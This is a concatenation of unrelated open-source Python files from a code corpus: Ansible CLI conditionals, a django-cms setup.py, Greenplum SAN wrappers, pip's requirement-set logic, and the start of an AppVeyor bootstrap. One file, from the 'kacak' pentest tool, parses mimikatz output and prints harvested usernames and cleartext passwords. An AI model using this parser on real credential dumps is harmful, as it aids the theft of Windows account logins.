raise ValueError("command '%s' not found" % command)
def get_responses(self):
return [cmd.response for cmd in self.commands]
def add_conditional(self, condition):
try:
self.conditionals.add(Conditional(condition))
except AttributeError as exc:
raise AddConditionError(msg=str(exc), condition=condition)
def run(self):
while self.retries > 0:
self.module.cli.add_commands(self.commands)
responses = self.module.cli.run_commands()
for item in list(self.conditionals):
if item(responses):
if self.match == 'any':
return item
self.conditionals.remove(item)
if not self.conditionals:
break
time.sleep(self.interval)
self.retries -= 1
else:
failed_conditions = [item.raw for item in self.conditionals]
errmsg = 'One or more conditional statements have not been satisfied'
raise FailedConditionsError(errmsg, failed_conditions)
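# ---------------------------------------------------------------------------
# Editor's note: illustrative usage sketch only, not part of the original
# Ansible module_utils file. It assumes `module` is an AnsibleModule-like
# object exposing `cli` (an instance of Cli above) and `connection`, which is
# what CommandRunner expects; the response indexing mirrors get_command().
def _example_command_runner_usage(module):
    runner = CommandRunner(module)
    runner.add_command('show version')
    # wait until the first response contains the string 'IOS'
    runner.add_conditional('result[0] contains IOS')
    runner.retries = 3
    runner.interval = 2
    try:
        runner.run()
    except FailedConditionsError as exc:
        module.fail_json(msg=str(exc),
                         failed_conditions=exc.failed_conditions)
    return runner.get_command('show version')
# ---------------------------------------------------------------------------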
class Conditional(object):
"""Used in command modules to evaluate waitfor conditions
"""
OPERATORS = {
'eq': ['eq', '=='],
'neq': ['neq', 'ne', '!='],
'gt': ['gt', '>'],
'ge': ['ge', '>='],
'lt': ['lt', '<'],
'le': ['le', '<='],
'contains': ['contains'],
'matches': ['matches']
}
def __init__(self, conditional, encoding=None):
self.raw = conditional
try:
key, op, val = shlex.split(conditional)
except ValueError:
raise ValueError('failed to parse conditional')
self.key = key
self.func = self._func(op)
self.value = self._cast_value(val)
def __call__(self, data):
value = self.get_value(dict(result=data))
return self.func(value)
def _cast_value(self, value):
if value in BOOLEANS_TRUE:
return True
elif value in BOOLEANS_FALSE:
return False
        elif re.match(r'^\d+\.\d+$', value):
return float(value)
elif re.match(r'^\d+$', value):
return int(value)
else:
return text_type(value)
def _func(self, oper):
for func, operators in self.OPERATORS.items():
if oper in operators:
return getattr(self, func)
raise AttributeError('unknown operator: %s' % oper)
def get_value(self, result):
try:
return self.get_json(result)
except (IndexError, TypeError, AttributeError):
msg = 'unable to apply conditional to result'
raise FailedConditionalError(msg, self.raw)
def get_json(self, result):
string = re.sub(r"\[[\'|\"]", ".", self.key)
string = re.sub(r"[\'|\"]\]", ".", string)
parts = re.split(r'\.(?=[^\]]*(?:\[|$))', string)
for part in parts:
match = re.findall(r'\[(\S+?)\]', part)
if match:
key = part[:part.find('[')]
result = result[key]
for m in match:
try:
m = int(m)
except ValueError:
m = str(m)
result = result[m]
else:
result = result.get(part)
return result
def number(self, value):
if '.' in str(value):
return float(value)
else:
return int(value)
def eq(self, value):
return value == self.value
def neq(self, value):
return value != self.value
def gt(self, value):
return self.number(value) > self.value
def ge(self, value):
return self.number(value) >= self.value
def lt(self, value):
return self.number(value) < self.value
def le(self, value):
return self.number(value) <= self.value
def contains(self, value):
return str(self.value) in value
def matches(self, value):
match = re.search(self.value, value, re.M)
return match is not None
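# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch only, not part of the original file.
# A Conditional parses a "<key> <operator> <value>" string and is called with
# the list of command responses; the key indexes into {'result': responses}
# via get_json(), as shown above.
def _example_conditional_usage():
    responses = ['Cisco IOS Software, Version 15.2', '00:12:34']
    cond = Conditional('result[0] contains IOS')
    assert cond(responses) is True
    cond = Conditional('result[1] neq 00:00:00')
    assert cond(responses) is True
# ---------------------------------------------------------------------------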
|
gpl-3.0
|
mfcovington/djangocms-genome-browser
|
setup.py
|
1
|
2128
|
import os
import sys
from setuptools import setup
if sys.version_info < (3, 2):
print("Sorry, djangocms-genome-browser currently requires Python 3.2+.")
sys.exit(1)
# From: https://hynek.me/articles/sharing-your-labor-of-love-pypi-quick-and-dirty/
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
install_requires = [
'Django>=1.7',
'django-cms>=3.0.7,<3.2',
'django-filer>=0.9.10',
]
setup(
name='djangocms-genome-browser',
version='0.1.1',
packages=['cms_genome_browser'],
include_package_data=True,
license='BSD License',
description='A Django app for incorporating a Dalliance genome browser into a Django site with django CMS-specific features',
long_description=(read('README.rst') + '\n\n' +
read('CHANGELOG.rst')),
url='https://github.com/mfcovington/djangocms-genome-browser',
author='Michael F. Covington',
author_email='[email protected]',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.7',
'Framework :: Django :: 1.8',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Topic :: Scientific/Engineering :: Visualization',
],
install_requires=install_requires,
)
|
bsd-3-clause
|
Netscape007/kacak
|
lib/mimikatz.py
|
8
|
1560
|
__VERSION__ = '2.0'
__AUTHOR__ = 'Galkan'
__DATE__ = '2014'
try:
import sys
import re
from lib.common import *
except ImportError,e:
import sys
sys.stdout.write("%s\n" %e)
sys.exit(1)
class Mimikatz:
def __init__(self, mimikatz_file):
self.mimikatz_file = mimikatz_file
self.mimikatz_start = re.compile("kerberos")
self.mimikatz_info = re.compile("\*\s([^\s]+)\s*:\s([^$]+$)")
def run(self):
read_file = open(self.mimikatz_file, "r").read().splitlines()
result = {}
username = ""
password = ""
control = 0
for line in read_file:
if re.search(self.mimikatz_start, line):
control = 1
elif (control == 1) and (re.search(self.mimikatz_info, line)):
user_info = re.search(self.mimikatz_info, line).groups(0)
if user_info[0] == "Username":
username = user_info[1]
if username and not username == "(null)" and not username in result.keys():
result[username] = ""
elif user_info[0] == "Password":
password = user_info[1]
if password and username and not password == "(null)":
result[username] = password
username = ""
password = ""
elif (control == 1) and (not re.search(self.mimikatz_info, line)):
control = 0
for user in sorted(result, key=result.get, reverse=False):
print bcolors.OKBLUE + "Kadi: " + bcolors.ENDC + bcolors.OKGREEN + "%s"% (user) + bcolors.ENDC + bcolors.OKBLUE + " Parola: " + bcolors.ENDC + bcolors.OKGREEN + "%s"% (result[user]) + bcolors.ENDC
|
mit
|
royc1/gpdb
|
gpMgmt/bin/gppylib/commands/san.py
|
30
|
1954
|
#!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2008. All Rights Reserved.
#
# Greenplum SAN related utility commands
from gppylib.commands.base import *
from gppylib.util.san_utils import SAN_CMDS
#----------mount ---------------
class Mount(Command):
"""Retrieves mount points."""
def __init__(self, name, devfirst=True, ctxt=LOCAL, remoteHost=None):
cmdStr = SAN_CMDS.MOUNT
self.devfirst = devfirst
print cmdStr
Command.__init__(self, name, cmdStr, ctxt, remoteHost)
@staticmethod
def remote(name, hostname, devfirst=True):
cmd = Mount(name, devfirst, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
return cmd
def get_mount_points(self):
mps = []
out = self.get_results().stdout.strip()
for l in out.split('\n'):
x = l.strip().split()
if self.devfirst:
thismp = (x[0], x[2])
else:
thismp = (x[2], x[0])
mps.append(thismp)
return mps
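# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch only, not part of the original file.
# get_mount_points() above assumes Linux-style `mount` output of the form
# "<device> on <mount point> type <fstype> (<options>)", so column 0 is the
# device and column 2 is the mount point. A rough standalone equivalent:
def _parse_mount_output(text, devfirst=True):
    mps = []
    for line in text.strip().split('\n'):
        cols = line.strip().split()
        mps.append((cols[0], cols[2]) if devfirst else (cols[2], cols[0]))
    return mps
# ---------------------------------------------------------------------------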
#----------inq ---------------
class Inq(Command):
def __init__(self, name, ctxt=LOCAL, remoteHost=None):
cmdStr = '%s -clar_wwn -no_dots' % SAN_CMDS.INQ
Command.__init__(self, name, cmdStr, ctxt, remoteHost)
@staticmethod
def remote(name, hostname):
cmd = Inq(name, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
return cmd
#----------gp_mount_agent ---------------
class GpMountAgentStorageGroup(Command):
def __init__(self, name, ctxt=LOCAL, remoteHost=None):
cmdStr = '%s --storagegroup %s' % (SAN_CMDS.GP_MOUNT_AGENT, SAN_CMDS.POWERMT)
Command.__init__(self, name, cmdStr, ctxt, remoteHost)
@staticmethod
def remote(name, hostname):
cmd = GpMountAgentStorageGroup(name, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
return cmd
|
apache-2.0
|
wunderlins/learning
|
python/django/lib/python2.7/site-packages/pip/req/req_set.py
|
53
|
32312
|
from __future__ import absolute_import
from collections import defaultdict
from itertools import chain
import logging
import os
from pip._vendor import pkg_resources
from pip._vendor import requests
from pip.compat import expanduser
from pip.download import (is_file_url, is_dir_url, is_vcs_url, url_to_path,
unpack_url)
from pip.exceptions import (InstallationError, BestVersionAlreadyInstalled,
DistributionNotFound, PreviousBuildDirError,
HashError, HashErrors, HashUnpinned,
DirectoryUrlHashUnsupported, VcsHashUnsupported)
from pip.req.req_install import InstallRequirement
from pip.utils import (
display_path, dist_in_usersite, ensure_dir, normalize_path)
from pip.utils.hashes import MissingHashes
from pip.utils.logging import indent_log
from pip.vcs import vcs
logger = logging.getLogger(__name__)
class Requirements(object):
def __init__(self):
self._keys = []
self._dict = {}
def keys(self):
return self._keys
def values(self):
return [self._dict[key] for key in self._keys]
def __contains__(self, item):
return item in self._keys
def __setitem__(self, key, value):
if key not in self._keys:
self._keys.append(key)
self._dict[key] = value
def __getitem__(self, key):
return self._dict[key]
def __repr__(self):
values = ['%s: %s' % (repr(k), repr(self[k])) for k in self.keys()]
return 'Requirements({%s})' % ', '.join(values)
class DistAbstraction(object):
"""Abstracts out the wheel vs non-wheel prepare_files logic.
The requirements for anything installable are as follows:
- we must be able to determine the requirement name
(or we can't correctly handle the non-upgrade case).
- we must be able to generate a list of run-time dependencies
without installing any additional packages (or we would
have to either burn time by doing temporary isolated installs
       or alternatively violate pip's 'don't start installing unless
       all requirements are available' rule - neither of which is
desirable).
- for packages with setup requirements, we must also be able
to determine their requirements without installing additional
packages (for the same reason as run-time dependencies)
- we must be able to create a Distribution object exposing the
above metadata.
"""
def __init__(self, req_to_install):
self.req_to_install = req_to_install
def dist(self, finder):
"""Return a setuptools Dist object."""
raise NotImplementedError(self.dist)
def prep_for_dist(self):
"""Ensure that we can get a Dist for this requirement."""
raise NotImplementedError(self.dist)
def make_abstract_dist(req_to_install):
"""Factory to make an abstract dist object.
Preconditions: Either an editable req with a source_dir, or satisfied_by or
a wheel link, or a non-editable req with a source_dir.
:return: A concrete DistAbstraction.
"""
if req_to_install.editable:
return IsSDist(req_to_install)
elif req_to_install.link and req_to_install.link.is_wheel:
return IsWheel(req_to_install)
else:
return IsSDist(req_to_install)
class IsWheel(DistAbstraction):
def dist(self, finder):
return list(pkg_resources.find_distributions(
self.req_to_install.source_dir))[0]
def prep_for_dist(self):
# FIXME:https://github.com/pypa/pip/issues/1112
pass
class IsSDist(DistAbstraction):
def dist(self, finder):
dist = self.req_to_install.get_dist()
# FIXME: shouldn't be globally added:
if dist.has_metadata('dependency_links.txt'):
finder.add_dependency_links(
dist.get_metadata_lines('dependency_links.txt')
)
return dist
def prep_for_dist(self):
self.req_to_install.run_egg_info()
self.req_to_install.assert_source_matches_version()
class Installed(DistAbstraction):
def dist(self, finder):
return self.req_to_install.satisfied_by
def prep_for_dist(self):
pass
class RequirementSet(object):
def __init__(self, build_dir, src_dir, download_dir, upgrade=False,
ignore_installed=False, as_egg=False, target_dir=None,
ignore_dependencies=False, force_reinstall=False,
use_user_site=False, session=None, pycompile=True,
isolated=False, wheel_download_dir=None,
wheel_cache=None, require_hashes=False):
"""Create a RequirementSet.
:param wheel_download_dir: Where still-packed .whl files should be
written to. If None they are written to the download_dir parameter.
Separate to download_dir to permit only keeping wheel archives for
pip wheel.
:param download_dir: Where still packed archives should be written to.
If None they are not saved, and are deleted immediately after
unpacking.
:param wheel_cache: The pip wheel cache, for passing to
InstallRequirement.
"""
if session is None:
raise TypeError(
"RequirementSet() missing 1 required keyword argument: "
"'session'"
)
self.build_dir = build_dir
self.src_dir = src_dir
# XXX: download_dir and wheel_download_dir overlap semantically and may
# be combined if we're willing to have non-wheel archives present in
# the wheelhouse output by 'pip wheel'.
self.download_dir = download_dir
self.upgrade = upgrade
self.ignore_installed = ignore_installed
self.force_reinstall = force_reinstall
self.requirements = Requirements()
# Mapping of alias: real_name
self.requirement_aliases = {}
self.unnamed_requirements = []
self.ignore_dependencies = ignore_dependencies
self.successfully_downloaded = []
self.successfully_installed = []
self.reqs_to_cleanup = []
self.as_egg = as_egg
self.use_user_site = use_user_site
self.target_dir = target_dir # set from --target option
self.session = session
self.pycompile = pycompile
self.isolated = isolated
if wheel_download_dir:
wheel_download_dir = normalize_path(wheel_download_dir)
self.wheel_download_dir = wheel_download_dir
self._wheel_cache = wheel_cache
self.require_hashes = require_hashes
# Maps from install_req -> dependencies_of_install_req
self._dependencies = defaultdict(list)
def __str__(self):
reqs = [req for req in self.requirements.values()
if not req.comes_from]
reqs.sort(key=lambda req: req.name.lower())
return ' '.join([str(req.req) for req in reqs])
def __repr__(self):
reqs = [req for req in self.requirements.values()]
reqs.sort(key=lambda req: req.name.lower())
reqs_str = ', '.join([str(req.req) for req in reqs])
return ('<%s object; %d requirement(s): %s>'
% (self.__class__.__name__, len(reqs), reqs_str))
def add_requirement(self, install_req, parent_req_name=None):
"""Add install_req as a requirement to install.
:param parent_req_name: The name of the requirement that needed this
added. The name is used because when multiple unnamed requirements
resolve to the same name, we could otherwise end up with dependency
links that point outside the Requirements set. parent_req must
already be added. Note that None implies that this is a user
supplied requirement, vs an inferred one.
:return: Additional requirements to scan. That is either [] if
the requirement is not applicable, or [install_req] if the
requirement is applicable and has just been added.
"""
name = install_req.name
if not install_req.match_markers():
logger.warning("Ignoring %s: markers %r don't match your "
"environment", install_req.name,
install_req.markers)
return []
install_req.as_egg = self.as_egg
install_req.use_user_site = self.use_user_site
install_req.target_dir = self.target_dir
install_req.pycompile = self.pycompile
if not name:
# url or path requirement w/o an egg fragment
self.unnamed_requirements.append(install_req)
return [install_req]
else:
try:
existing_req = self.get_requirement(name)
except KeyError:
existing_req = None
if (parent_req_name is None and existing_req and not
existing_req.constraint and
existing_req.extras == install_req.extras and not
existing_req.req.specs == install_req.req.specs):
raise InstallationError(
'Double requirement given: %s (already in %s, name=%r)'
% (install_req, existing_req, name))
if not existing_req:
# Add requirement
self.requirements[name] = install_req
# FIXME: what about other normalizations? E.g., _ vs. -?
if name.lower() != name:
self.requirement_aliases[name.lower()] = name
result = [install_req]
else:
# Assume there's no need to scan, and that we've already
# encountered this for scanning.
result = []
if not install_req.constraint and existing_req.constraint:
if (install_req.link and not (existing_req.link and
install_req.link.path == existing_req.link.path)):
self.reqs_to_cleanup.append(install_req)
raise InstallationError(
"Could not satisfy constraints for '%s': "
"installation from path or url cannot be "
"constrained to a version" % name)
# If we're now installing a constraint, mark the existing
# object for real installation.
existing_req.constraint = False
existing_req.extras = tuple(
sorted(set(existing_req.extras).union(
set(install_req.extras))))
logger.debug("Setting %s extras to: %s",
existing_req, existing_req.extras)
# And now we need to scan this.
result = [existing_req]
# Canonicalise to the already-added object for the backref
# check below.
install_req = existing_req
if parent_req_name:
parent_req = self.get_requirement(parent_req_name)
self._dependencies[parent_req].append(install_req)
return result
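        # ------------------------------------------------------------------
        # Editor's note: illustrative sketch only, not part of the original
        # pip source. Typical use of add_requirement(), assuming
        # InstallRequirement.from_line() from pip.req.req_install and an
        # already-constructed requests session:
        #
        #     req_set = RequirementSet(build_dir, src_dir, download_dir=None,
        #                              session=session)
        #     req = InstallRequirement.from_line('requests>=2.0')
        #     to_scan = req_set.add_requirement(req)
        #     # returns [] if markers don't match, else the reqs to scan next
        # ------------------------------------------------------------------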
def has_requirement(self, project_name):
name = project_name.lower()
if (name in self.requirements and
not self.requirements[name].constraint or
name in self.requirement_aliases and
not self.requirements[self.requirement_aliases[name]].constraint):
return True
return False
@property
def has_requirements(self):
return list(req for req in self.requirements.values() if not
req.constraint) or self.unnamed_requirements
@property
def is_download(self):
if self.download_dir:
self.download_dir = expanduser(self.download_dir)
if os.path.exists(self.download_dir):
return True
else:
logger.critical('Could not find download directory')
raise InstallationError(
"Could not find or access download directory '%s'"
% display_path(self.download_dir))
return False
def get_requirement(self, project_name):
for name in project_name, project_name.lower():
if name in self.requirements:
return self.requirements[name]
if name in self.requirement_aliases:
return self.requirements[self.requirement_aliases[name]]
raise KeyError("No project with the name %r" % project_name)
def uninstall(self, auto_confirm=False):
for req in self.requirements.values():
if req.constraint:
continue
req.uninstall(auto_confirm=auto_confirm)
req.commit_uninstall()
def prepare_files(self, finder):
"""
Prepare process. Create temp directories, download and/or unpack files.
"""
# make the wheelhouse
if self.wheel_download_dir:
ensure_dir(self.wheel_download_dir)
# If any top-level requirement has a hash specified, enter
# hash-checking mode, which requires hashes from all.
root_reqs = self.unnamed_requirements + self.requirements.values()
require_hashes = (self.require_hashes or
any(req.has_hash_options for req in root_reqs))
if require_hashes and self.as_egg:
raise InstallationError(
'--egg is not allowed with --require-hashes mode, since it '
'delegates dependency resolution to setuptools and could thus '
'result in installation of unhashed packages.')
# Actually prepare the files, and collect any exceptions. Most hash
# exceptions cannot be checked ahead of time, because
# req.populate_link() needs to be called before we can make decisions
# based on link type.
discovered_reqs = []
hash_errors = HashErrors()
for req in chain(root_reqs, discovered_reqs):
try:
discovered_reqs.extend(self._prepare_file(
finder,
req,
require_hashes=require_hashes,
ignore_dependencies=self.ignore_dependencies))
except HashError as exc:
exc.req = req
hash_errors.append(exc)
if hash_errors:
raise hash_errors
def _check_skip_installed(self, req_to_install, finder):
"""Check if req_to_install should be skipped.
This will check if the req is installed, and whether we should upgrade
or reinstall it, taking into account all the relevant user options.
After calling this req_to_install will only have satisfied_by set to
None if the req_to_install is to be upgraded/reinstalled etc. Any
other value will be a dist recording the current thing installed that
satisfies the requirement.
Note that for vcs urls and the like we can't assess skipping in this
routine - we simply identify that we need to pull the thing down,
then later on it is pulled down and introspected to assess upgrade/
reinstalls etc.
:return: A text reason for why it was skipped, or None.
"""
# Check whether to upgrade/reinstall this req or not.
req_to_install.check_if_exists()
if req_to_install.satisfied_by:
skip_reason = 'satisfied (use --upgrade to upgrade)'
if self.upgrade:
best_installed = False
# For link based requirements we have to pull the
# tree down and inspect to assess the version #, so
                # it's handled way down.
if not (self.force_reinstall or req_to_install.link):
try:
finder.find_requirement(req_to_install, self.upgrade)
except BestVersionAlreadyInstalled:
skip_reason = 'up-to-date'
best_installed = True
except DistributionNotFound:
# No distribution found, so we squash the
# error - it will be raised later when we
# re-try later to do the install.
# Why don't we just raise here?
pass
if not best_installed:
# don't uninstall conflict if user install and
# conflict is not user install
if not (self.use_user_site and not
dist_in_usersite(req_to_install.satisfied_by)):
req_to_install.conflicts_with = \
req_to_install.satisfied_by
req_to_install.satisfied_by = None
return skip_reason
else:
return None
def _prepare_file(self,
finder,
req_to_install,
require_hashes=False,
ignore_dependencies=False):
"""Prepare a single requirements file.
:return: A list of additional InstallRequirements to also install.
"""
# Tell user what we are doing for this requirement:
# obtain (editable), skipping, processing (local url), collecting
# (remote url or package name)
if req_to_install.constraint or req_to_install.prepared:
return []
req_to_install.prepared = True
# ###################### #
# # print log messages # #
# ###################### #
if req_to_install.editable:
logger.info('Obtaining %s', req_to_install)
else:
# satisfied_by is only evaluated by calling _check_skip_installed,
# so it must be None here.
assert req_to_install.satisfied_by is None
if not self.ignore_installed:
skip_reason = self._check_skip_installed(
req_to_install, finder)
if req_to_install.satisfied_by:
assert skip_reason is not None, (
'_check_skip_installed returned None but '
'req_to_install.satisfied_by is set to %r'
% (req_to_install.satisfied_by,))
logger.info(
'Requirement already %s: %s', skip_reason,
req_to_install)
else:
if (req_to_install.link and
req_to_install.link.scheme == 'file'):
path = url_to_path(req_to_install.link.url)
logger.info('Processing %s', display_path(path))
else:
logger.info('Collecting %s', req_to_install)
with indent_log():
# ################################ #
# # vcs update or unpack archive # #
# ################################ #
if req_to_install.editable:
if require_hashes:
raise InstallationError(
'The editable requirement %s cannot be installed when '
'requiring hashes, because there is no single file to '
'hash.' % req_to_install)
req_to_install.ensure_has_source_dir(self.src_dir)
req_to_install.update_editable(not self.is_download)
abstract_dist = make_abstract_dist(req_to_install)
abstract_dist.prep_for_dist()
if self.is_download:
req_to_install.archive(self.download_dir)
elif req_to_install.satisfied_by:
if require_hashes:
logger.debug(
'Since it is already installed, we are trusting this '
'package without checking its hash. To ensure a '
'completely repeatable environment, install into an '
'empty virtualenv.')
abstract_dist = Installed(req_to_install)
else:
# @@ if filesystem packages are not marked
# editable in a req, a non deterministic error
# occurs when the script attempts to unpack the
# build directory
req_to_install.ensure_has_source_dir(self.build_dir)
# If a checkout exists, it's unwise to keep going. version
# inconsistencies are logged later, but do not fail the
# installation.
# FIXME: this won't upgrade when there's an existing
# package unpacked in `req_to_install.source_dir`
if os.path.exists(
os.path.join(req_to_install.source_dir, 'setup.py')):
raise PreviousBuildDirError(
"pip can't proceed with requirements '%s' due to a"
" pre-existing build directory (%s). This is "
"likely due to a previous installation that failed"
". pip is being responsible and not assuming it "
"can delete this. Please delete it and try again."
% (req_to_install, req_to_install.source_dir)
)
req_to_install.populate_link(
finder, self.upgrade, require_hashes)
# We can't hit this spot and have populate_link return None.
# req_to_install.satisfied_by is None here (because we're
# guarded) and upgrade has no impact except when satisfied_by
# is not None.
# Then inside find_requirement existing_applicable -> False
# If no new versions are found, DistributionNotFound is raised,
# otherwise a result is guaranteed.
assert req_to_install.link
link = req_to_install.link
# Now that we have the real link, we can tell what kind of
# requirements we have and raise some more informative errors
# than otherwise. (For example, we can raise VcsHashUnsupported
# for a VCS URL rather than HashMissing.)
if require_hashes:
# We could check these first 2 conditions inside
# unpack_url and save repetition of conditions, but then
# we would report less-useful error messages for
# unhashable requirements, complaining that there's no
# hash provided.
if is_vcs_url(link):
raise VcsHashUnsupported()
elif is_file_url(link) and is_dir_url(link):
raise DirectoryUrlHashUnsupported()
if (not req_to_install.original_link and
not req_to_install.is_pinned):
# Unpinned packages are asking for trouble when a new
# version is uploaded. This isn't a security check, but
# it saves users a surprising hash mismatch in the
# future.
#
# file:/// URLs aren't pinnable, so don't complain
# about them not being pinned.
raise HashUnpinned()
hashes = req_to_install.hashes(
trust_internet=not require_hashes)
if require_hashes and not hashes:
# Known-good hashes are missing for this requirement, so
# shim it with a facade object that will provoke hash
# computation and then raise a HashMissing exception
# showing the user what the hash should be.
hashes = MissingHashes()
try:
download_dir = self.download_dir
# We always delete unpacked sdists after pip ran.
autodelete_unpacked = True
if req_to_install.link.is_wheel \
and self.wheel_download_dir:
# when doing 'pip wheel` we download wheels to a
# dedicated dir.
download_dir = self.wheel_download_dir
if req_to_install.link.is_wheel:
if download_dir:
# When downloading, we only unpack wheels to get
# metadata.
autodelete_unpacked = True
else:
# When installing a wheel, we use the unpacked
# wheel.
autodelete_unpacked = False
unpack_url(
req_to_install.link, req_to_install.source_dir,
download_dir, autodelete_unpacked,
session=self.session, hashes=hashes)
except requests.HTTPError as exc:
logger.critical(
'Could not install requirement %s because '
'of error %s',
req_to_install,
exc,
)
raise InstallationError(
'Could not install requirement %s because '
'of HTTP error %s for URL %s' %
(req_to_install, exc, req_to_install.link)
)
abstract_dist = make_abstract_dist(req_to_install)
abstract_dist.prep_for_dist()
if self.is_download:
# Make a .zip of the source_dir we already created.
if req_to_install.link.scheme in vcs.all_schemes:
req_to_install.archive(self.download_dir)
# req_to_install.req is only avail after unpack for URL
# pkgs repeat check_if_exists to uninstall-on-upgrade
# (#14)
if not self.ignore_installed:
req_to_install.check_if_exists()
if req_to_install.satisfied_by:
if self.upgrade or self.ignore_installed:
# don't uninstall conflict if user install and
# conflict is not user install
if not (self.use_user_site and not
dist_in_usersite(
req_to_install.satisfied_by)):
req_to_install.conflicts_with = \
req_to_install.satisfied_by
req_to_install.satisfied_by = None
else:
logger.info(
'Requirement already satisfied (use '
'--upgrade to upgrade): %s',
req_to_install,
)
# ###################### #
# # parse dependencies # #
# ###################### #
dist = abstract_dist.dist(finder)
more_reqs = []
def add_req(subreq):
sub_install_req = InstallRequirement(
str(subreq),
req_to_install,
isolated=self.isolated,
wheel_cache=self._wheel_cache,
)
more_reqs.extend(self.add_requirement(
sub_install_req, req_to_install.name))
# We add req_to_install before its dependencies, so that we
# can refer to it when adding dependencies.
if not self.has_requirement(req_to_install.name):
# 'unnamed' requirements will get added here
self.add_requirement(req_to_install, None)
if not ignore_dependencies:
if (req_to_install.extras):
logger.debug(
"Installing extra requirements: %r",
','.join(req_to_install.extras),
)
missing_requested = sorted(
set(req_to_install.extras) - set(dist.extras)
)
for missing in missing_requested:
logger.warning(
'%s does not provide the extra \'%s\'',
dist, missing
)
available_requested = sorted(
set(dist.extras) & set(req_to_install.extras)
)
for subreq in dist.requires(available_requested):
add_req(subreq)
# cleanup tmp src
self.reqs_to_cleanup.append(req_to_install)
if not req_to_install.editable and not req_to_install.satisfied_by:
# XXX: --no-install leads this to report 'Successfully
# downloaded' for only non-editable reqs, even though we took
# action on them.
self.successfully_downloaded.append(req_to_install)
return more_reqs
def cleanup_files(self):
"""Clean up files, remove builds."""
logger.debug('Cleaning up...')
with indent_log():
for req in self.reqs_to_cleanup:
req.remove_temporary_source()
def _to_install(self):
"""Create the installation order.
The installation order is topological - requirements are installed
before the requiring thing. We break cycles at an arbitrary point,
and make no other guarantees.
"""
# The current implementation, which we may change at any point
# installs the user specified things in the order given, except when
# dependencies must come earlier to achieve topological order.
order = []
ordered_reqs = set()
def schedule(req):
if req.satisfied_by or req in ordered_reqs:
return
if req.constraint:
return
ordered_reqs.add(req)
for dep in self._dependencies[req]:
schedule(dep)
order.append(req)
for install_req in self.requirements.values():
schedule(install_req)
return order
def install(self, install_options, global_options=(), *args, **kwargs):
"""
Install everything in this set (after having downloaded and unpacked
the packages)
"""
to_install = self._to_install()
if to_install:
logger.info(
'Installing collected packages: %s',
', '.join([req.name for req in to_install]),
)
with indent_log():
for requirement in to_install:
if requirement.conflicts_with:
logger.info(
'Found existing installation: %s',
requirement.conflicts_with,
)
with indent_log():
requirement.uninstall(auto_confirm=True)
try:
requirement.install(
install_options,
global_options,
*args,
**kwargs
)
except:
# if install did not succeed, rollback previous uninstall
if (requirement.conflicts_with and not
requirement.install_succeeded):
requirement.rollback_uninstall()
raise
else:
if (requirement.conflicts_with and
requirement.install_succeeded):
requirement.commit_uninstall()
requirement.remove_temporary_source()
self.successfully_installed = to_install
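# --- Illustrative sketch (not part of pip) ----------------------------------
# A minimal, self-contained model of the topological ordering performed by
# _to_install() above: each requirement's dependencies are emitted before the
# requirement itself, and cycles are broken at an arbitrary point. The graph
# in the example comment is hypothetical.
def _example_install_order(dependencies, roots):
    """Return names in install order (dependencies first, cycles tolerated)."""
    order = []
    seen = set()
    def schedule(name):
        if name in seen:
            return
        seen.add(name)
        for dep in dependencies.get(name, ()):
            schedule(dep)
        order.append(name)
    for root in roots:
        schedule(root)
    return order
# Example:
#   _example_install_order({"requests": ["urllib3", "idna"]}, ["requests"])
#   -> ['urllib3', 'idna', 'requests']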
|
gpl-2.0
|
ssov/python-calc
|
ci/appveyor-bootstrap.py
|
9
|
4444
|
"""
AppVeyor will at least have a few Pythons around, so there's no point in implementing a bootstrapper in PowerShell.
This is a port of https://github.com/pypa/python-packaging-user-guide/blob/master/source/code/install.ps1
with various fixes and improvements that just weren't feasible to implement in PowerShell.
"""
from __future__ import print_function
from os import environ
from os.path import exists
from subprocess import check_call
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
BASE_URL = "https://www.python.org/ftp/python/"
GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
GET_PIP_PATH = r"C:\get-pip.py"
URLS = {
("2.6", "64"): BASE_URL + "2.6.6/python-2.6.6.amd64.msi",
("2.6", "32"): BASE_URL + "2.6.6/python-2.6.6.msi",
("2.7", "64"): BASE_URL + "2.7.10/python-2.7.10.amd64.msi",
("2.7", "32"): BASE_URL + "2.7.10/python-2.7.10.msi",
# NOTE: no .msi installer for 3.3.6
("3.3", "64"): BASE_URL + "3.3.3/python-3.3.3.amd64.msi",
("3.3", "32"): BASE_URL + "3.3.3/python-3.3.3.msi",
("3.4", "64"): BASE_URL + "3.4.3/python-3.4.3.amd64.msi",
("3.4", "32"): BASE_URL + "3.4.3/python-3.4.3.msi",
("3.5", "64"): BASE_URL + "3.5.0/python-3.5.0-amd64.exe",
("3.5", "32"): BASE_URL + "3.5.0/python-3.5.0.exe",
}
INSTALL_CMD = {
# Commands are allowed to fail only if they are not the last command. Eg: uninstall (/x) allowed to fail.
"2.6": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"2.7": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
"3.3": [["msiexec.exe", "/L*+!", "install.log", "/qn", "/x", "{path}"],
["msiexec.exe", "/L*+!", "install.log", "/qn", "/i", "{path}", "TARGETDIR={home}"]],
